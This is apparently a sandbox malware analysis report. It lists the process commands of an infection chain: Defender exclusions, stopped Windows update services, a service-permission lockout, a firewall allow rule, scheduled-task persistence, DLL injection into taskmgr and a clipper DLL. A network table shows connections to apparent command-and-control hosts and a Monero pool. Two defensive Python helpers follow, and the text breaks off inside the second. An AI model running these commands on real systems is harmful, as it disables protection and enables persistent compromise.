"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8d7b946f8,0x7ff8d7b94708,0x7ff8d7b94718

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,12578530505721159643,8959805834061612385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\6A06.exe

C:\Users\Admin\AppData\Local\Temp\6A06.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\76C8.exe

C:\Users\Admin\AppData\Local\Temp\76C8.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\7C09.exe

C:\Users\Admin\AppData\Local\Temp\7C09.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\8263.exe

C:\Users\Admin\AppData\Local\Temp\8263.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5144 -ip 5144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,13229475234041979219,17042306138840279881,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
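
Of the defence-evasion commands in the list above, the `sc sdset WinDefender ...` line is the one that does not read at a glance. The descriptor it installs grants LocalSystem start, stop and pause, grants Administrators everything except SERVICE_STOP and SERVICE_PAUSE_CONTINUE and then explicitly denies those two with the `(D;;WPDT;;;BA)` ACE, so an elevated `sc stop` or `net stop` against the rogue service fails; the SACL entry only turns on failure auditing for Everyone. The decoder below is an added example, not code from the report or from the sample: it parses the SDDL string copied from the process list using the standard service-rights abbreviations and summarises what Administrators can still do. The function names and output layout are this example's own.

```python
"""Decode the service security descriptor (SDDL) that the sample applies with
`sc sdset WinDefender ...` and report what it does to the Administrators group.

Added example, not code from the report.  SAMPLE_SDDL is copied verbatim from
the process list; the rights/SID tables are the standard service SDDL
abbreviations, and the function names are this example's own.
"""
import re

# Service-specific rights as abbreviated in the rights field of a service ACE.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE",
    "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
WELL_KNOWN_SIDS = {"SY": "LocalSystem", "BA": "Administrators",
                   "IU": "Interactive", "SU": "Service", "WD": "Everyone"}
ACE_TYPES = {"A": "allow", "D": "deny", "AU": "audit"}
ACE_FLAGS = {"SA": "audit-success", "FA": "audit-failure"}

# Copied from the report: the descriptor set on the "WinDefender" service.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
               "(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

ACE_RE = re.compile(r"\(([^)]*)\)")


def _pairs(s):
    """Split a run of two-letter abbreviations: 'WPDT' -> ['WP', 'DT']."""
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def parse_ace(text):
    """'type;flags;rights;object;inherit;sid' -> dict with names resolved."""
    ace_type, flags, rights, _obj, _inh, sid = text.split(";")[:6]
    return {
        "type": ACE_TYPES.get(ace_type, ace_type),
        "flags": [ACE_FLAGS.get(f, f) for f in _pairs(flags)],
        "rights": [SERVICE_RIGHTS.get(r, r) for r in _pairs(rights)],
        "principal": WELL_KNOWN_SIDS.get(sid, sid),
    }


def parse_sddl(sddl):
    """Return {'dacl': [...], 'sacl': [...]}; O:/G: owner fields are ignored."""
    out = {"dacl": [], "sacl": []}
    for prefix, key in (("D:", "dacl"), ("S:", "sacl")):
        m = re.search(re.escape(prefix) + r"[A-Z]*((?:\([^)]*\))*)", sddl)
        if m:
            out[key] = [parse_ace(a) for a in ACE_RE.findall(m.group(1))]
    return out


def effective_rights(acl, principal):
    """Allowed minus denied for one principal.  Windows walks ACEs in order
    (canonical DACLs put denies first); since this descriptor's allow and
    deny ACEs for BA do not overlap, the set difference gives the same answer."""
    allowed, denied = set(), set()
    for ace in acl:
        if ace["principal"] != principal:
            continue
        if ace["type"] == "allow":
            allowed.update(ace["rights"])
        elif ace["type"] == "deny":
            denied.update(ace["rights"])
    return allowed - denied


def service_control_lockout(sddl, principal="Administrators"):
    """Summarise what an operator in `principal` can still do to the service."""
    have = effective_rights(parse_sddl(sddl)["dacl"], principal)
    return {
        "can_stop": "SERVICE_STOP" in have,
        "can_pause": "SERVICE_PAUSE_CONTINUE" in have,
        "can_delete": "DELETE" in have,
        "can_rewrite_dacl": "WRITE_DAC" in have,  # the recovery path
    }


if __name__ == "__main__":
    for ace in parse_sddl(SAMPLE_SDDL)["dacl"]:
        print(ace["type"], ace["principal"], ", ".join(ace["rights"]))
    print(service_control_lockout(SAMPLE_SDDL))
```

Run stand-alone it prints one line per DACL ACE and the lockout summary. `can_rewrite_dacl` comes back True because the allow ACE still grants WRITE_DAC (`WD`) to Administrators, so an elevated `sc sdset WinDefender` with a sane descriptor restores control, after which the service can be stopped and `C:\Windows\windefender.exe` removed. The scheduled tasks (`csrss`, `GoogleUpdateTaskMachineQC`, `explothe.exe`), the `netsh advfirewall` allow rule for `C:\Windows\rss\csrss.exe` and the Defender exclusions added with `Add-MpPreference` in the same list need separate cleanup.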

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
RU 5.42.92.211:80 5.42.92.211 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
FI 77.91.124.55:19071 - tcp
FI 77.91.124.55:19071 - tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
N/A 224.0.0.251:5353 - udp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
GB 96.16.110.41:443 - tcp
US 192.229.221.95:80 - tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 bytecloudasa.website udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 39.212.67.172.in-addr.arpa udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 204.79.197.200:443 - tcp
US 204.79.197.200:443 - tcp
US 204.79.197.200:443 - tcp
US 204.79.197.200:443 - tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
FI 77.91.124.55:19071 - tcp
FI 77.91.124.55:19071 - tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 bytecloudasa.website udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 cb235b0d-2d05-456e-b56a-3a772aab28c6.uuid.cdntokiog.studio udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
FI 77.91.124.55:19071 - tcp
FI 77.91.124.55:19071 - tcp
US 8.8.8.8:53 server8.cdntokiog.studio udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.ipfire.org udp
DE 81.3.27.44:3478 stun.ipfire.org udp
BG 185.82.216.49:443 server8.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 44.27.3.81.in-addr.arpa udp
US 8.8.8.8:53 49.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 172.67.212.39:80 - tcp
US 172.67.212.39:80 - tcp
US 8.8.8.8:53 - udp
US 172.67.212.39:80 - tcp
FI 77.91.124.55:19071 - tcp
FI 77.91.124.55:19071 - tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 124.253.47.212.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 80.190.68.51.in-addr.arpa udp
FI 77.91.124.55:19071 - tcp
FI 77.91.124.55:19071 - tcp
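
The Network table has four columns, but the Domain cell is blank on rows where the sandbox had no name for the peer (`77.91.124.55:19071`, `204.79.197.200:443`, the multicast `224.0.0.251:5353`), and most of the `8.8.8.8:53` rows are reverse (`in-addr.arpa`) lookups of addresses that appear elsewhere as connection targets, not names the sample resolved. The parser below is an added example, not code from the report: it reads rows in the layout printed above (a missing Domain cell or a `-` placeholder both count as blank), folds PTR names back onto their IPs, lends a domain seen on one row to unnamed rows for the same IP, and lists the names that were queried but never connected to. The sample rows are copied from the table; `RESOLVER` and the function names are assumptions of this example.

```python
"""Turn the sandbox Network table into a peer list: drop the resolver's own
traffic, fold reverse (PTR) lookups back onto the IPs they describe, and
carry a domain from a named row onto the unnamed rows for the same IP.

Added example, not code from the report.  SAMPLE_ROWS are copied from the
Network table (the Domain column is blank on some rows, exactly as the
sandbox prints it); RESOLVER and the function names are this example's own.
"""
import ipaddress
from collections import Counter

RESOLVER = "8.8.8.8:53"   # the guest's DNS server as seen in the table

SAMPLE_ROWS = """\
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
N/A 224.0.0.251:5353 udp
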